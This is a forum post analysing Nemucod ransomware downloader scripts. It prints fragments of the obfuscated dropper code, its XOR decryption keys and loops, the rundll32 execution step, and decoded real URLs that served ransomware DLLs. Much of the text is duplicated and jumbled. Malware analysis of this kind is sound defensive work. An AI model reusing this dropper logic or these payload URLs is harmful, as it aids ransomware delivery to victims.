- May 14, 2016
- 1,597
3 files From : https://malwaretips.com/threads/31-8-16-6.62930/
Thanks to @Solarquest)
Sample 3 : csnLmN.wsf
Sample 4 : d13gTz.wsf
Sample 1 : qXKlF.html
5/55 Antivirus scan for 044510cf9b3c0ac7c60df3a8717ed9d0f150112168d97c1cdbe63839d49fbeed at 2016-08-31 13:12:22 UTC - VirusTotal
5/56 Antivirus scan for 8d1f122fcbe0da9a3b1081552398bdffd55670d4348fff31711ba81d61107788 at 2016-08-31 13:13:35 UTC - VirusTotal
=>Similar obfuscation Methods used in a previous sample I analyzed :
Some changes but urls used are easily retrieved, by same method I used before
1) sample 3 & 4 : same URLS & Payload name(s) :
Looking at the end of the script
Explanations :
Names for the files downloaded :
URLs :
Payload : (3 names but exactly the same ransomware ) :
2 ) NEMUCOD part :
with some function that will be used to deobfuscate the downloaded file and make it a real .dll :
All usual, these functions are hidden in a var in a Base64 encoded string.
Result on spoiler part
The ciphered key used do do the XOR part, in red :
3) run :
4) Difference with other Nemucod samples :
To deobfuscate the payload, some functions we saw from last nemucod version (from other donwloader scripts) are not present (like in the same analysis of similar wsf droppers)
On latest version I have seen from other scripted downloader, the XOR part use :
5) For sample 1 similar : qXKlF.html
The only difference :
Thanks to @Solarquest)
Sample 3 : csnLmN.wsf
Sample 4 : d13gTz.wsf
Sample 1 : qXKlF.html
5/55 Antivirus scan for 044510cf9b3c0ac7c60df3a8717ed9d0f150112168d97c1cdbe63839d49fbeed at 2016-08-31 13:12:22 UTC - VirusTotal
5/56 Antivirus scan for 8d1f122fcbe0da9a3b1081552398bdffd55670d4348fff31711ba81d61107788 at 2016-08-31 13:13:35 UTC - VirusTotal
=>Similar obfuscation Methods used in a previous sample I analyzed :
Some changes but urls used are easily retrieved, by same method I used before
1) sample 3 & 4 : same URLS & Payload name(s) :
Looking at the end of the script
var mahorkavodkatvarMASHEVHORDA17 = "sYCfiSIE;
var mahorkavodkatvarTRAxKey = mahorkavodkatvarMASHEVfsta("i4qGajo8QJA8VtuKNag3OyYhcnIEKcql");
for(mahorkavodkatvarMASHEVHORDA5 in mahorkavodkatvarMASHEV_a5){
var mahorkavodkatvarTRAxKey = mahorkavodkatvarMASHEVfsta("i4qGajo8QJA8VtuKNag3OyYhcnIEKcql");
var mahorkavodkatvarMASHEV_a5 =
var mahorkavodkatvarMASHEVHORDAI = 0;[
]; "dPOUNI3d3LnBvbGktbWVjLml0L2poQkhUWWPOUNIw=",
for(mahorkavodkatvarMASHEVHORDA5 in mahorkavodkatvarMASHEV_a5){
var mahorkavodkatvarMASHEVHORDA6 = "http://"+mahorkavodkatvarMASHEV_a5[mahorkavodkatvarMASHEVHORDA5].mahorkavodkatvarDREAMTEAM() + "?mssGTlVi=KiqvaljO";
Explanations :
Names for the files downloaded :
"sYCfiSIE" + index
=> sYCfiSIE1,
=> sYCfiSIE2
=> sYCfiSIE3
=> sYCfiSIE2
=> sYCfiSIE3
URLs :
A tab is easy to be found with these values :
This is Base64 codes but with a part to obfuscate them a bit more.
Looking at their function which do the coding part:
Looking at their function which do the coding part:
String.prototype.mahorkavodkatvarDREAMTEAM = function() {
String.prototype.mahorkavodkatvarDREAMTEAM = function() {
mahorkavodkatvarMASHEVXCOP = 0;
var mahorkavodkatvarMASHEVddDccC1, mahorkavodkatvarMASHEVddDccC2, mahorkavodkatvarMASHEVc3, mahorkavodkatvarMASHEVc4;
var mahorkavodkatvarMASHEVout = "";
var mahorkavodkatvarMASHEVpechenka= this["replace"](/POUNI/g, '');
var mahorkavodkatvarMASHEVlen = mahorkavodkatvarMASHEVsud(mahorkavodkatvarMASHEVpechenka);
... (Base64 decode stuff)
}var mahorkavodkatvarMASHEVddDccC1, mahorkavodkatvarMASHEVddDccC2, mahorkavodkatvarMASHEVc3, mahorkavodkatvarMASHEVc4;
var mahorkavodkatvarMASHEVout = "";
var mahorkavodkatvarMASHEVpechenka= this["replace"](/POUNI/g, '');
var mahorkavodkatvarMASHEVlen = mahorkavodkatvarMASHEVsud(mahorkavodkatvarMASHEVpechenka);
... (Base64 decode stuff)
this["replace"](/POUNI/g, ''); => All POUNI has to be removed from text passed in parameter, to become Base64 real codes
=> Base64 real codes :
=> Base64 real codes :
With a Base64 decode tool :
=> URLs :
"http://" + "lanjaron.es.mialias.net/jhBHTYl", + "?UXRxPvxm=QKvTymv"
"http://" + "iftikharchaudhry.50webs.com/jhBHTYl", + "?UXRxPvxm=QKvTymv"
"http://" + "bW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw=" + "?UXRxPvxm=QKvTymv"
"http://" + "iftikharchaudhry.50webs.com/jhBHTYl", + "?UXRxPvxm=QKvTymv"
"http://" + "bW9qZWplemUucmVwdWJsaWthLnBsL2poQkhUWWw=" + "?UXRxPvxm=QKvTymv"
Payload : (3 names but exactly the same ransomware ) :
"http://" + "lanjaron.es.mialias.net/jhBHTYl?UXRxPvxm=QKvTymv"
=> sYCfiSIE1 => sYCfiSIE1.dll
"http://" + "iftikharchaudhry.50webs.com/jhBHTYl?UXRxPvxm=QKvTymv"
=> sYCfiSIE2 => sYCfiSIE2.dll
"http://" + "mojejeze.republika.pl/jhBHTYl?UXRxPvxm=QKvTymv"
=> sYCfiSIE3 => sYCfiSIE3.dll
.dll extensions are added when the deobfuscation of real files is a success
2 ) NEMUCOD part :
with some function that will be used to deobfuscate the downloaded file and make it a real .dll :
var mahorkavodkatvarMASHEVLUCIODOR = "CWZ1bmN0aW9uIG1haG9ya2F2b2RrYXR2YXJNQVNIRVZydGZ0YShmaWxlUGF0aCkNCnsNCiAgICB2YXIgbWFob3JrYXZvZGthdHZhcklTSEVWcm9zdGVrcz1XU2NyaXB0WyJDcmVhdGVPYmplY3QiXSgiQURPREIuU3RyZWFtIik7DQogICAgbWFob3JrYXZvZGthdHZhcklTSEVWcm9zdGVrc1s ..........................................
All usual, these functions are hidden in a var in a Base64 encoded string.
Result on spoiler part
function mahorkavodkatvarMASHEVrtfta(filePath)
function mahorkavodkatvarMASHEVfats(codeArray)
function mahorkavodkatvarMASHEVsatt(filePath, codeArray)
function mahorkavodkatvarMASHEVxdac(mahorkavodkatvarMASHEVcca)
var mahorkavodkatvarISHEVrosteks=WScript["CreateObject"]("ADODB.Stream");
var fileString=mahorkavodkatvarISHEVrosteks["ReadText"];
return mahorkavodkatvarMASHEVfsta(fileString);
var fileString=mahorkavodkatvarISHEVrosteks["ReadText"];
return mahorkavodkatvarMASHEVfsta(fileString);
function mahorkavodkatvarMASHEVfats(codeArray)
var t2=new Array();
var t2=new Array();
var EGj=new Array();
var resultString="";
var HIi3;
var OVc9;
for (var Tj=0; Tj < codeArray["length"]; Tj++)
return resultString;
};var t2=new Array();
var EGj=new Array();
var resultString="";
var HIi3;
var OVc9;
for (var Tj=0; Tj < codeArray["length"]; Tj++)
if (HIi3 < 128){OVc9=HIi3;
return resultString;
function mahorkavodkatvarMASHEVsatt(filePath, codeArray)
var mahorkavodkatvarISHEVrosteks=WScript["CreateObject"]("ADODB.Stream");
mahorkavodkatvarISHEVrosteks["SaveToFile"](filePath, 2);
mahorkavodkatvarISHEVrosteks["SaveToFile"](filePath, 2);
function mahorkavodkatvarMASHEVxdac(mahorkavodkatvarMASHEVcca)
for (var Tj=0; Tj < mahorkavodkatvarMASHEVcca["length"]; Tj++)
mahorkavodkatvarMASHEVcca[Tj] ^= mahorkavodkatvarTRAxKey[Math.floor(Tj % mahorkavodkatvarTRAxKey.length)];
return mahorkavodkatvarMASHEVcca;{
mahorkavodkatvarMASHEVcca[Tj] ^= mahorkavodkatvarTRAxKey[Math.floor(Tj % mahorkavodkatvarTRAxKey.length)];
var mahorkavodkatvarTRAxKey = mahorkavodkatvarMASHEVfsta("i4qGajo8QJA8VtuKNag3OyYhcnIEKcql");
It returns the real string where each chars will be used for the famous XOR part : ^=
(once each of this string chars has been used => it jumps to the first char and continues)
function xdac(content_file)
See previous analysis :
It returns the real string where each chars will be used for the famous XOR part : ^=
(once each of this string chars has been used => it jumps to the first char and continues)
function xdac(content_file)
for (var index =0; i < content_file.length; index++)
content_file[index] ^= xKey[Math.floor(index % xKey.length)];
return content_file;{
content_file[index] ^= xKey[Math.floor(index % xKey.length)];
See previous analysis :
3) run :
rundll32 is used, with the path file, and parameter for the dll : qwerty
4) Difference with other Nemucod samples :
To deobfuscate the payload, some functions we saw from last nemucod version (from other donwloader scripts) are not present (like in the same analysis of similar wsf droppers)
=> this is only for the XOR part, so easier in these scripts
On latest version I have seen from other scripted downloader, the XOR part use :
var random = function(range) {
function rawprng(){
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}function rawprng(){
5) For sample 1 similar : qXKlF.html
The only difference :
this.replace(/LUABUA/g, '');
eval(alkotesterzercerLOBIKLUCIODOR); => eval hidden part
var alkotesterzercerLOBIKHORDA17 = "EhFjFSNri"; => file when obfuscated
var alkotesterzercerTRAxKey = alkotesterzercerLOBIKfsta("OQX7NmUJ9OUmet5z24IaOwr0HoASBB7j");
Result : aKey deciphered used forXOR part
var alkotesterzercerLOBIK_a5 =
Base64 decode :
URLS :eval(alkotesterzercerLOBIKLUCIODOR); => eval hidden part
var alkotesterzercerLOBIKHORDA17 = "EhFjFSNri"; => file when obfuscated
var alkotesterzercerTRAxKey = alkotesterzercerLOBIKfsta("OQX7NmUJ9OUmet5z24IaOwr0HoASBB7j");
Result : aKey deciphered used forXOR part
var alkotesterzercerLOBIK_a5 =
Base64 decode :
"http://" + "www .itogazaidan.jp/HJghjt872" + "?'MnKqQCLOB=aTDtnTWp"
"http://" + "convenilifecanbe.web.fc2.com/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"
"http://" + "reeused.web.fc2.com/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"
PAYLOAD :"http://" + "convenilifecanbe.web.fc2.com/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"
"http://" + "reeused.web.fc2.com/HJghjt872" + "?MnKqQCLOB=aTDtnTWp"
EhFjFSNri1 => EhFjFSNri1.dll
EhFjFSNri3 => EhFjFSNri2.dll
EhFjFSNri3 => EhFjFSNri3.dll
EhFjFSNri3 => EhFjFSNri2.dll
EhFjFSNri3 => EhFjFSNri3.dll
Last edited: